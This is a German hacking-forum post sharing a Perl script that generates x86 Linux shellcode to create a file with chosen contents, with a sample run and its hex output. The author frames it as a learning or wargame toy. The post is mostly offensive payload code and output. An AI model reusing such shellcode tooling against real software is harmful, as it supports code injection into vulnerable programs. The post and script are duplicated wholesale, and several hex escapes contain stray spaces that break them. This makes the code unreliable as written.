fred777
20.09.2010, 16:06
Jo, habe drüber nachgedacht ob es hier einen interessiert, aber ich poste es trotzdem mal, ist nen kleiner Shellcodegen, der Shellcode erstellt, welcher widerrum Dateien mit fast beliebigem Inhalt erstellt.
Das ganze hat außer vielleicht für korrupte Wargames keinen wirklichen Sinn, zum lernen allerdings ganz nett :D
Beispiel:
mint@mint ~/Desktop $ perl shellcode.pl test.txt fred777!
-= create file shellcode gen 1.0 =-
[-] loading names
[-] generating shellcode
[-] done
\x6a\x08\x58\x99\x52\x68\x2e\x74\x78\x74\x68\x74\x 65\x73\x74\x8d\x1c\x24\x6a\xff\x59\xcd\x80\x8d\x18 \x6a\x04\x58\x68\x37\x37\x37\x21\x68\x66\x72\x65\x 64\x8d\x0c\x24\x6a\x08\x5a\xcd\x80\x6a\x06\x58\xcd \x80\x6a\x01\x58\x31\xdb\xcd\x80
# create file shellcode generator [x86tux]
# Usage: <*.pl> <file> <text>
#
# by fred777 [fred777.tk]
use strict;
$|++;
my ($file,$text) = @ARGV;
my ($ptext,$pfile,$c,$d,$tlen,$shellcode,$temp,@tem,$ austr,@auarr);
my $rules = "
Error\n
text-length under 255 bytes?\n
length : 4 = 0 ?\n";
die "Usage: <*.pl> <file> <text>\n" unless($file&&$text);
die $rules unless((!(length($file)%4))&&(!(length($text)%4))&&(length($text)<=255));
my $head = '\x6a\x08\x58\x99\x52';
my $core = '\x8d\x1c\x24\x6a\xff\x59\xcd\x80\x8d\x18\x6a\x04\ x58';
my $math = '\x8d\x0c\x24\x6a';
my $end = '\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\x31\ xdb\xcd\x80';
my @f = split(//,$file);
my @t = split(//,$text);
$c = 0;
$d = 1;
foreach(@t) {
$temp .= $_;
(push @tem,$temp) && (undef($temp)) if((!($d%4)) &&($d));
$d++;
}
@tem = reverse @tem;
foreach(@tem) {$austr .= $_;}
@auarr = split(//,$austr);
foreach(@auarr) {
$ptext .= '\x68' if(!($c%4));
$ptext .= unhex($_);
$c++;
} $c=0;$d=1;
undef $austr;
undef @auarr;
undef @tem;
undef $temp;
foreach(@f) {
$temp .= $_;
(push @tem,$temp) && (undef($temp)) if((!($d%4))&&($d));
$d++;
}
@tem = reverse @tem;
foreach(@tem) {$austr .= $_;}
@auarr = split(//,$austr);
foreach(@auarr) {
$pfile .= '\x68' if (!($c%4));
$pfile .= unhex($_);
$c++;
}
$tlen = sprintf("%x",length($text));
$tlen = "0$tlen" if (length($tlen)<2);
$tlen = "\\x$tlen";
$shellcode = $head.$pfile.$core.$ptext.$math.$tlen.$end;
print "
-= create file shellcode gen 1.0 =-\n[-] loading names\n[-] generating shellcode\n[-] done\n\n";
print "$shellcode\n\n";
sub unhex($) {
(my $ascstr = shift) =~ s/(.)/sprintf("\\x%x", ord $1)/eg;
return $ascstr;
}
Das ganze hat außer vielleicht für korrupte Wargames keinen wirklichen Sinn, zum lernen allerdings ganz nett :D
Beispiel:
mint@mint ~/Desktop $ perl shellcode.pl test.txt fred777!
-= create file shellcode gen 1.0 =-
[-] loading names
[-] generating shellcode
[-] done
\x6a\x08\x58\x99\x52\x68\x2e\x74\x78\x74\x68\x74\x 65\x73\x74\x8d\x1c\x24\x6a\xff\x59\xcd\x80\x8d\x18 \x6a\x04\x58\x68\x37\x37\x37\x21\x68\x66\x72\x65\x 64\x8d\x0c\x24\x6a\x08\x5a\xcd\x80\x6a\x06\x58\xcd \x80\x6a\x01\x58\x31\xdb\xcd\x80
# create file shellcode generator [x86tux]
# Usage: <*.pl> <file> <text>
#
# by fred777 [fred777.tk]
use strict;
$|++;
my ($file,$text) = @ARGV;
my ($ptext,$pfile,$c,$d,$tlen,$shellcode,$temp,@tem,$ austr,@auarr);
my $rules = "
Error\n
text-length under 255 bytes?\n
length : 4 = 0 ?\n";
die "Usage: <*.pl> <file> <text>\n" unless($file&&$text);
die $rules unless((!(length($file)%4))&&(!(length($text)%4))&&(length($text)<=255));
my $head = '\x6a\x08\x58\x99\x52';
my $core = '\x8d\x1c\x24\x6a\xff\x59\xcd\x80\x8d\x18\x6a\x04\ x58';
my $math = '\x8d\x0c\x24\x6a';
my $end = '\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\x31\ xdb\xcd\x80';
my @f = split(//,$file);
my @t = split(//,$text);
$c = 0;
$d = 1;
foreach(@t) {
$temp .= $_;
(push @tem,$temp) && (undef($temp)) if((!($d%4)) &&($d));
$d++;
}
@tem = reverse @tem;
foreach(@tem) {$austr .= $_;}
@auarr = split(//,$austr);
foreach(@auarr) {
$ptext .= '\x68' if(!($c%4));
$ptext .= unhex($_);
$c++;
} $c=0;$d=1;
undef $austr;
undef @auarr;
undef @tem;
undef $temp;
foreach(@f) {
$temp .= $_;
(push @tem,$temp) && (undef($temp)) if((!($d%4))&&($d));
$d++;
}
@tem = reverse @tem;
foreach(@tem) {$austr .= $_;}
@auarr = split(//,$austr);
foreach(@auarr) {
$pfile .= '\x68' if (!($c%4));
$pfile .= unhex($_);
$c++;
}
$tlen = sprintf("%x",length($text));
$tlen = "0$tlen" if (length($tlen)<2);
$tlen = "\\x$tlen";
$shellcode = $head.$pfile.$core.$ptext.$math.$tlen.$end;
print "
-= create file shellcode gen 1.0 =-\n[-] loading names\n[-] generating shellcode\n[-] done\n\n";
print "$shellcode\n\n";
sub unhex($) {
(my $ascstr = shift) =~ s/(.)/sprintf("\\x%x", ord $1)/eg;
return $ascstr;
}